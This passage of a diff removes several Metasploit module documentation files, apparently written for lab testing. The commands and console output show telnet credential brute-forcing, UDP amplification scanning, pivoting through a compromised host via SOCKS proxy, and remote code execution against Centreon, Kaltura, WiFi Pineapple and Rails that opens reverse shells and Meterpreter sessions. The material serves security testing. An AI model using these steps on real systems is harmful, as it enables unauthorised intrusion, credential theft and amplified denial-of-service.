-msf auxiliary(brocade_enable_login) > set user_as_pass true
-user_as_pass => true
-msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
-pass_file => /passwords.lst
-msf auxiliary(brocade_enable_login) > run
-
-[*]  Attempting username gathering from config on 127.0.0.1
-[*]    Found: username@127.0.0.1
-[*]    Found: ttrogdon@127.0.0.1
-[*]    Found: dmudd@127.0.0.1
-[*]  Attempting username gathering from running-config on 127.0.0.1
-[*]    Found: TopDogUser@127.0.0.1
-[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
-[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
-[*] Attempting to start session 127.0.0.1:23 with username:password
-[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
-[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
-[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
-[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
-[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(brocade_enable_login) > sessions -l
-
-Active sessions
-===============
-
-  Id  Type    Information                              Connection
-  --  ----    -----------                              ----------
-  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
-  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
-
-msf auxiliary(brocade_enable_login) >
-```
@@ -1,125 +0,0 @@
-## Vulnerable Application
-
-  Any reachable UDP endpoint is a potential target.
-
-## Verification Steps
-
-  Example steps in this format:
-
-  1. Start `msfconsole`
-  2. Do: ```use auxiliary/scanner/udp/udp_amplification```
-  3. Do `set RHOSTS [targets]`, replacing ```[targets]``` with the hosts you wish to assess.
-  4. Do ```set PORTS [ports]```, replacing ```[ports]``` with the list of UDP ports you wish to assess on each asset.
-  5. Optionally, ```set PROBE [probe]```, replacing ```[probe]``` with a string or `file://` resource to serve as the UDP payload
-  6. Do: ```run```
-  7. If any of the endpoints were discovered to be vulnerable to UDP amplification with the probe you specified, status will be printed indicating as such.
-
-## Options
-
-  **PORTS**
-
-  This is the list of ports to test for UDP amplification on each host.
-  Formats like `1,2,3`, `1-3`, `1,2-3`, etc, are all supported.  You'll
-  generally only want to specify a small, targeted set of ports with an
-  appropriately tailored `PROBE` value, described below
-
-  **PROBE**
-
-  This is the payload to send in each UDP datagram. Unset or set to the empty
-  string `''` or `""` to send empty UDP datagrams, or use the `file://`
-  resource to specify a local file to serve as the UDP payload.
-
-## Scenarios
-
-  ```
-  resource (amp.rc)> use auxiliary/scanner/udp/udp_amplification
-  resource (amp.rc)> set RHOSTS 10.10.16.0/20 192.168.3.0/23
-  RHOSTS => 10.10.16.0/20 192.168.3.0/23
-  resource (amp.rc)> set PORTS 17,19,12345
-  PORTS => 17,19,12345
-  resource (amp.rc)> set THREADS 100
-  THREADS => 100
-  resource (amp.rc)> set PROBE 'test'
-  PROBE => test
-  resource (amp.rc)> run
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.16.0->10.10.16.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.18.0->10.10.18.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.20.0->10.10.20.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.21.0->10.10.21.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.22.0->10.10.22.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.23.0->10.10.23.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.24.0->10.10.24.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.25.0->10.10.25.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.27.0->10.10.27.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.28.0->10.10.28.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.29.0->10.10.29.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.30.0->10.10.30.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.31.0->10.10.31.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 192.168.3.0->192.168.3.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 192.168.4.0->192.168.4.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.17.0->10.10.17.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.19.0->10.10.19.255 (256 hosts)
-  [*] Sending 4-byte probes to 3 port(s) on 10.10.26.0->10.10.26.255 (256 hosts)
-  [*] Scanned  512 of 4608 hosts (11% complete)
-  [+] 10.10.17.153:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 10.10.20.47:17 - susceptible to UDP amplification: No packet amplification and a 40x, 159-byte bandwidth amplification
-  [*] Scanned 2560 of 4608 hosts (55% complete)
-  [+] 10.10.23.199:19 - susceptible to UDP amplification: No packet amplification and a 256x, 1020-byte bandwidth amplification
-  [+] 10.10.23.248:17 - susceptible to UDP amplification: No packet amplification and a 26x, 103-byte bandwidth amplification
-  [*] Scanned 3584 of 4608 hosts (77% complete)
-  [*] Scanned 3840 of 4608 hosts (83% complete)
-  [+] 10.10.30.202:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [*] Scanned 4096 of 4608 hosts (88% complete)
-  [+] 192.168.3.64:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.3.71:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.3.73:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.3.77:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.3.100:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.3.113:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.3.118:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [+] 192.168.4.253:19 - susceptible to UDP amplification: 2x packet amplification and a 37x, 144-byte bandwidth amplification
-  [+] 192.168.3.178:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
-  [*] Scanned 4352 of 4608 hosts (94% complete)
-  [+] 192.168.4.254:19 - susceptible to UDP amplification: 2x packet amplification and a 37x, 144-byte bandwidth amplification
-  [*] Scanned 4608 of 4608 hosts (100% complete)
-  [*] Auxiliary module execution completed
-  ```
-
-  Similarly, but with empty UDP datagrams instead:
-
-  ```
-  resource (amp.rc)> unset PROBE
-  Unsetting PROBE...
-  resource (amp.rc)> run
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.16.0->10.10.16.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.17.0->10.10.17.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.18.0->10.10.18.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.19.0->10.10.19.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.20.0->10.10.20.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.21.0->10.10.21.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.22.0->10.10.22.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.23.0->10.10.23.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.24.0->10.10.24.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.25.0->10.10.25.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.26.0->10.10.26.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.27.0->10.10.27.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.28.0->10.10.28.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.29.0->10.10.29.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.30.0->10.10.30.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 10.10.31.0->10.10.31.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 192.168.3.0->192.168.3.255 (256 hosts)
-  [*] Sending 0-byte probes to 3 port(s) on 192.168.4.0->192.168.4.255 (256 hosts)
-  [+] 10.10.17.229:17 - susceptible to UDP amplification: No packet amplification and a 107x, 107-byte bandwidth amplification
-  [+] 10.10.26.252:19 - susceptible to UDP amplification: No packet amplification and a 3892x, 3892-byte bandwidth amplification
-  [*] Scanned 4096 of 4608 hosts (88% complete)
-  [+] 192.168.3.113:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
-  [+] 192.168.3.114:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
-  [+] 192.168.3.115:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
-  [+] 192.168.3.178:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
-  [+] 192.168.3.184:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
-  [*] Scanned 4352 of 4608 hosts (94% complete)
-  [+] 192.168.4.253:19 - susceptible to UDP amplification: 2x packet amplification and a 148x, 148-byte bandwidth amplification
-  [+] 192.168.4.254:19 - susceptible to UDP amplification: 2x packet amplification and a 148x, 148-byte bandwidth amplification
-  [*] Scanned 4608 of 4608 hosts (100% complete)
-  [*] Auxiliary module execution completed
-  ```
@@ -1,60 +0,0 @@
-## Verification Steps
-
-  1. Start `msfconsole`
-  2. Do: `use auxiliary/server/socks4a`
-  3. Do: `run`
-  4. Do: `curl --proxy socks4a://localhost:1080 https://github.com`
-  5. You should see the source for the Github homepage
-
-## Options
-
-  **SRVHOST**
-
-  The local IP address to bind the proxy to. The default value of `0.0.0.0` will expose the proxy to everything on the attacker's network.
-
-  **SRVPORT**
-
-  The local port to bind the proxy to. The default value is `1080`, the standard port for a socks4a proxy.
-
-## Scenarios
-
-  This module is great when pivoting across a network. Suppose we have two machines:
-
-  1. Attacker's machine, on the `192.168.1.0/24` subnet.
-  2. Victim machine with two network interfaces, one attached to the `192.168.1.0/24` subnet and the other attached to the non-routable `10.0.0.0/24` subnet.
-
-  We'll begin by starting the socks4a proxy:
-  ```
-  msf > use auxiliary/server/socks4a
-  msf auxiliary(socks4a) > run
-  [*] Auxiliary module execution completed
-  [*] Starting the socks4a proxy server
-  msf auxiliary(socks4a) >
-  ```
-
-  Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the `autoroute` script to enable access to the non-routable subnet:
-
-  ```
-  meterpreter > run autoroute -s 10.0.0.0/24
-  ```
-
-  The `autoroute` module will enable our local socks4a proxy to direct all traffic to the `10.0.0.0/24` subnet through our Meterpreter session, causing it to emerge from the victim's machine and thus giving us access to the non-routable subnet. We can now use `curl` to connect to a machine on the non-routable subnet via the socks4a proxy:
-  ```
-  curl --proxy socks4a://localhost:1080 http://10.0.0.15:8080/robots.txt
-  ```
-
-  We can take this a step further and use proxychains to enable other tools that don't have built-in support for proxies to access the non-routable subnet. The short-and-sweet guide to installing and configuring proxychains looks something like this:
-
-  ```
-  # apt-get install proxychains
-  # cp /etc/proxychains.conf /etc/proxychains.conf.backup
-  # echo "socks4 127.0.0.1 8080" > /etc/proxychains.conf
-  ```
-
-  From there, we can use our other tools by simply prefixing them with `proxychains`:
-
-  ```
-  # proxychains curl http://10.0.0.15:8080/robots.txt
-  # proxychains nmap -sT -Pn -n -p 22 10.0.0.15
-  # proxychains firefox
-  ```
@@ -1,211 +0,0 @@
-## Vulnerable Application
-
-1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
-2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
-
-### Creating A Testing Environment
-
-Creating a testing environment for this application contained many steps, so I figured I would document the process here.
-
-  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install. My user was `centreon`
-  2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
-```
-sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
-sudo add-apt-repository ppa:ondrej/php
-sudo apt-get install php5.6
-sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
-sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
-sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
-  select OK
-  select No Configuration
-sudo apt-get install snmp-mibs-downloader
-```
-  3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
-```
-a2enmod php5.6
-a2dismod php7.0
-```
-  4. Restart apache with `sudo apache2ctl restart`
-  5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.  The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
-```
-wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
-tar xvf nagios-plugins-2.1.1.tar.gz
-cd nagios-plugins-2.1.1/
-./configure
-make
-sudo make install
-```
-  5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)
-```
--- plugins/sslutils.c.orig   2016-01-14 20:02:06.419867000 +0100
-+++ plugins/sslutils.c   2016-01-14 20:01:36.091492000 +0100
-@@ -70,8 +70,13 @@
-#endif
-      break;
-   case 3: /* SSLv3 protocol */
-+#if defined(OPENSSL_NO_SSL3)
-+      printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
-+      return STATE_CRITICAL;
-+#else
-      method = SSLv3_client_method();
-      ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
-+#endif
-      break;
-   default: /* Unsupported */
-      printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
-```
-  6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-clib
-cd centreon-clib/build
-cmake .
-make
-sudo make install
-```
-  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-broker
-cd centreon-broker/build/
-cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
-make
-sudo make install
-```
-  8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-engine
-cd centreon-engine/build/
-cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
-make
-sudo make install
-```
-  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.
-```
-sudo mkdir /var/log/centreon-engine
-cd ~
-sudo pear install XML_RPC-1.4.5
-(may need to install php-xml)
-wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
-tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
-cd centreon-2.5.3
-sudo ./install.sh -i
-  <enter>
-  q
-  y
-  y
-  y
-  y
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  <enter>
-  centreon
-  <enter>
-  /var/log/centreon-engine
-  /home/centreon/nagios-plugins-2.1.1/plugins
-  <enter>
-  /etc/init.d/centengine
-  /usr/local/bin/centengine
-  /usr/local/etc/
-  /usr/local/etc/
-  /etc/init.d/centengine
-  <enter>
-  y
-  y
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  y
-  y
-  <enter>
-  y
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  y
-  y
-```
-  10. Fix apache config
-```
-sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
-sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
-sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
-sudo a2enconf centreon
-sudo service apache2 reload
-```
-  11. Configure via website.  Browse to <ip>/centreon
-```
-next
-next
-select centreon-engine
-  /usr/local/lib/centreon-engine
-  /usr/local/bin/centenginestats
-  /usr/local/lib/centreon-engine
-  /usr/local/lib/centreon-engine
-  /usr/local/lib/centreon-engine
-  next
-select centreon-broker
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/cbmod.so
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/centreon-broker
-  next
-Pick whatever details about your user you want, next
-Fill in mysql Root password, next
-next
-next
-finish
-```
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/linux/http/centreon_useralias_exec`
-  4. Do: `set payload`
-  5. Do: `set rhost`
-  6. Do: `check`
-  7. Do: ```run```
-  8. You should get a shell.
-
-## Scenarios
-
-Just a standard run.
-
-    msf > use exploit/linux/http/centreon_useralias_exec
-    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
-    lhost => 192.168.2.229
-    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
-    rhost => 192.168.2.85
-    msf exploit(centreon_useralias_exec) > set verbose true
-    verbose => true
-    msf exploit(centreon_useralias_exec) > check
-    [+] Version Detected: 2.5.3
-    [*] 192.168.2.85:80 The target appears to be vulnerable.
-    msf exploit(centreon_useralias_exec) > exploit
-    [*] Started reverse TCP handler on 192.168.2.229:4444 
-    [*] Sending malicious login
-    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
-    whoami
-    www-data
-    uname -a
-    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-```
@@ -1,147 +0,0 @@
-## Vulnerable Application
-
-This module exploits an Object Injection vulnerability in Kaltura. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the context of the web server user.
-
-Kaltura has a module named keditorservices that takes user input and then uses it as an unserialized function parameter. The constructed object is based on the SektionEins Zend code execution POP chain PoC, with a minor modification to ensure Kaltura processes it and the Zend_Log function's __destruct() method is called. Kaltura versions prior to 11.1.0-2 are affected by this issue.
-
-**Vulnerable Application Installation Steps**
-
-Kaltura has their own RPM and/or DEB packages to help us to install it without any issue. Following steps are slightly different than official wiki in order to install the vulnerable packages.
-
-Following steps are valid on the CentOS 6 x64 bit operating system.
-
-1. Install CentOS-6 x64 and run `yum update -y` in order to fetch and install the latest packages. Also setting the hostname to something like _kalturahack.dev_ would be wise, because it will be used during Kaltura installation.
-2. Disable iptables and selinux. 
-```
-iptables -F
-service iptables stop
-chkconfig iptables off
-setenforce permissive
-(selinux will be enabled on reboot unless editing /etc/selinux/config file.)
-```
-3. Install following pre-requisites.
-* PHP 5.3.n, 5.4.n, 5.5.n, 5.6.n [the official distro repo version]
-* MySQL/MariaDB [the official distro repo version]. Please make sure your MySQL is configured not to enforce strict mode.
-* JRE 1.7.n (openjdk can be used)
-
-4. Install Kaltura yum repo.
-```
-rpm -ihv http://installrepo.kaltura.org/releases/kaltura-release.noarch.rpm
-```
-
-5. Kaltura repo is configured for the latest version by default. We need to change it to one of the vulnerable releases. Thus, open `/etc/yum.repos.d/kaltura.repo` file with your favorite text editor and perform following replacement.
-
-Original file. (# lines just ignored)
-```
-[Kaltura]
-name = Kaltura Server
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/$basearch/
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1 
-enabled = 1
-
-[Kaltura-noarch]
-name = Kaltura Server arch independent
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/noarch
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1
-enabled = 1
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/$basearch/
-```
-After changes.
-```
-[Kaltura]
-name = Kaltura Server
-baseurl = http://installrepo.kaltura.org/releases/10.10.0/RPMS/$basearch/
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1 
-enabled = 1
-
-[Kaltura-noarch]
-name = Kaltura Server arch independent
-baseurl = http://installrepo.kaltura.org/releases/10.10.0/RPMS/noarch
-gpgkey = http://installrepo.kaltura.org/releases/RPM-GPG-KEY-kaltura
-gpgcheck = 1
-enabled = 1
-baseurl = http://installrepo.kaltura.org/releases/latest/RPMS/$basearch/
-```
-
-6. Install kaltura-server. This will take a while. 
-```
-yum clean all
-yum install kaltura-server
-```
-
-7. Run the following commands in order to initiate the database and start necessary services.
-```
-/opt/kaltura/bin/kaltura-mysql-settings.sh
-service memcached restart
-service ntpd restart
-chkconfig memcached on
-chkconfig ntpd on
-```
-
-8. Start the kaltura configuration script `/opt/kaltura/bin/kaltura-config-all.sh` .
-
-```
-[Email\NO]: "<your email address>"
-CDN hostname [kalrpm.lcl]: "<your hostname>"
-Apache virtual hostname [kalrpm.lcl]: "<your hostname>"
-Which port will this Vhost listen on [80]?:
-
-DB hostname [127.0.0.1]: "<127.0.0.1>"
-DB port [3306]: "<3306>"
-MySQL super user [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: "<root>"
-MySQL super user passwd [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: "<your root password>"
-Analytics DB hostname [127.0.0.1]: "<127.0.0.1>"
-Analytics DB port [3306]: "<3306>"
-Sphinx hostname [127.0.0.1]: "<127.0.0.1>"
-
-Secondary Sphinx hostname: [leave empty if none] "<empty>"
-
-VOD packager hostname [kalrpm.lcl]: "<http://kaltura-nginx-hostname>"
-
-VOD packager port to listen on [88]: 
-
-Service URL [http://kalrpm.lcl:80]: "<http://apache-hostname:80>"
-
-Kaltura Admin user (email address): "<your email address>"
-Admin user login password (must be minimum 8 chars and include at least one of each: upper-case, lower-case, number and a special character): "<your kaltura admin password>"
-Confirm passwd: "<your kaltura admin password>"
-
-Your time zone [see http://php.net/date.timezone], or press enter for [Europe/Amsterdam]: "<your timezone>"
-How would you like to name your system (this name will show as the From field in emails sent by the system) [Kaltura Video Platform]? "<your preferred system name>"
-Your website Contact Us URL [http://corp.kaltura.com/company/contact-us]: "<your contact URL>"
-'Contact us' phone number [+1 800 871 5224]? "<your phone numer>"
-
-Is your Apache working with SSL?[Y/n] "<n>"
-It is recommended that you do work using HTTPs. Would you like to continue anyway?[N/y] "<y>"
-Which port will this Vhost listen on? [80] "<80>"
-Please select one of the following options [0]: "<0>"
-```
-
-I do recommend that leaving all default values as is except SSL. You may want to install Kaltura without SSL support.
-
-These steps are slightly different than following instruction.
-[http://kaltura-install-packages.readthedocs.io/en/latest/install-kaltura-redhat-based/](http://kaltura-install-packages.readthedocs.io/en/latest/install-kaltura-redhat-based/)
-
-## Verification Steps
-
-A successful check of the exploit will look like this:
-
-```
-msf > use exploit/unix/webapp/kaltura_unserialize_rce 
-msf exploit(kaltura_unserialize_rce) > set RHOST centoshacker.dev
-RHOST => centoshacker.dev
-msf exploit(kaltura_unserialize_rce) > check
-[+] centoshacker.dev:80 The target is vulnerable.
-msf exploit(kaltura_unserialize_rce) > exploit 
-
-[*] Started reverse TCP handler on 10.0.0.1:4444 
-[*] Sending stage (33721 bytes) to 10.0.0.134
-[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.134:50312) at 2016-09-17 22:56:44 +0300
-
-meterpreter > pwd
-/opt/kaltura/app/alpha/web
-meterpreter >
-```
@@ -1,21 +0,0 @@
-## Background
-
-The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
-pre-authorized CSS files, which allows the attacker to bypass
-authentication. The exploit then relies on the anti-CSRF vulnerability
-(CVE-2015-4624) to obtain command injection.
-
-This exploit uses a utility function in
-/components/system/configuration/functions.php to execute commands once
-authorization has been bypassed.
-
-## Verification
-
-This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
-default options are generally effective due to having a set state after being
-flashed. You will need to be connected to the WiFi pineapple network (e.g. via
-WiFi or ethernet).
-
-Assuming the above 2.3 firmware is installed, this exploit should always work.
-If it does not, try it again. It should always work as long as the pineapple is
-in its default configuration.
@@ -1,28 +0,0 @@
-## Background
-
-This module uses a challenge solver exploit which impacts two possible states
-of the device: pre-password set and post-password set. The pre-password set
-vulnerability uses a default password and a weak anti-CSRF (CVE-2015-4624)
-check to obtain shell by logging in and pre-computing the solution to
-the anti-CSRF check.
-
-The post-password set vulnerability uses the fact that there is a 1 in 27
-chance of correctly guessing the challenge solution. This attack resets the
-password to a password chosen by the attacker (we suggest the default
-'pineapplesareyummy' to decrease collateral damage on victims) and then
-performs the same anti-CSRF attack as the pre-password vulnerability.
-
-This exploit uses a utility function in
-/components/system/configuration/functions.php to execute commands once
-authorization has been bypassed.
-
-## Verification
-
-This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
-default options are generally effective due to having a set state after being
-flashed. You will need to be connected to the WiFi pineapple network (e.g. via
-WiFi or ethernet).
-
-Assuming the above 2.3 firmware is installed, this exploit should always work.
-If it does not, try it again. It should always work as long as the pineapple is
-in its default configuration.
@@ -1,79 +0,0 @@
-## Intro
-
-Rails is a web application development framework written in the Ruby language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks.
-
-http://rubyonrails.org/
-
-> This module exploits the rendering vulnerability via a temporary file upload to pop a shell (CVE-2016-0752).
-
-## Setup
-
-**Download and setup the sample vuln application:**
-
- [ ] `sudo apt-get install -y curl git`
- [ ] `curl -L https://get.rvm.io | bash -s stable --autolibs=3 --ruby=2.3.1`
- [ ] `source ~/.rvm/scripts/rvm`
- [ ] `sudo apt-get install rubygems ruby-dev nodejs zlib1g-dev -y`
- [ ] `gem install rails -v 4.0.8`
- [ ] `git clone https://github.com/forced-request/rails-rce-cve-2016-0752 pwn`
- [ ] `cd pwn`
- [ ] `bundle install`
- [ ] Edit the config/routes.rb file and add `post "users/:id", to: 'user#show'`
-
-Basically, you just need a POST endpoint for the temporary file upload trick. Now you can start the rails server and test the module.
-
- [ ] `rails s -b 0.0.0.0` or `rails s -b 0.0.0.0 -e production`
-
-## Usage
-
-### Typical Usage
-
-Just set ```RHOST``` and fire off the module! It's pretty much painless.
-```set VERBOSE true``` if you want to see details.
-
-```
-saturn:metasploit-framework mr_me$ cat scripts/rails.rc 
-use exploit/multi/http/rails_dynamic_render_code_exec
-set RHOST 172.16.175.251
-set payload linux/x86/meterpreter/reverse_tcp
-set LHOST 172.16.175.1
-check
-exploit
-
